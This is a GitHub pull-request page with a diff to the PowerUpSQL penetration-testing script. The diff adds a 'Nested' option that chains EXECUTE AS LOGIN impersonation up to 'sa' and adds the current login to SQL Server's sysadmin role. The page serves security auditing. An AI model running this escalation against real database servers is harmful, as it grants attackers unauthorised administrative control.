Skip to content

Added Nested Flag to Invoke-SQLAuditPrivImpersonateLogin #34

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Mar 29, 2021
Merged

Added Nested Flag to Invoke-SQLAuditPrivImpersonateLogin #34

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
46 changes: 45 additions & 1 deletion PowerUpSQL.ps1
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -21854,6 +21854,8 @@ Function Invoke-SQLAuditPrivImpersonateLogin
Don't output anything.
.PARAMETER Exploit
Exploit vulnerable issues
.PARAMETER Nested
Exploit Nested Impersonation Capabilites
.EXAMPLE
PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123!

Expand Down Expand Up @@ -21917,7 +21919,11 @@ Function Invoke-SQLAuditPrivImpersonateLogin

[Parameter(Mandatory = $false,
HelpMessage = 'Exploit vulnerable issues.')]
[switch]$Exploit
[switch]$Exploit,

[Parameter(Mandatory = $false,
HelpMessage = 'Exploit Nested Impersonation Capabilites.')]
[switch]$Nested
)

Begin
Expand Down Expand Up @@ -22069,6 +22075,44 @@ Function Invoke-SQLAuditPrivImpersonateLogin
Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
$Exploited = 'No'
}
}
# ---------------------------------------------------------------
# Exploit Nested Impersonation Vulnerability
# ---------------------------------------------------------------
if($Nested)
{
# Status user
Write-Verbose -Message "$Instance : - EXPLOITING: Starting Nested Impersonation exploit process (under assumption to levels of nesting and 1st first can impersonate sa)..."

# Check if user is already a sysadmin
$SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
if($SysadminPreCheck -eq 0)
{
# Status user
Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin."
Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role..."

# Attempt to add the current login to sysadmins fixed server role
$null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'"

# Verify the login was added successfully
$SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
if($SysadminPostCheck -eq 1)
{
Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!"
$Exploited = 'Yes'
}
else
{
Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin."
}
}
else
{
# Status user
Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
$Exploited = 'No'
}
}
}
else
Expand Down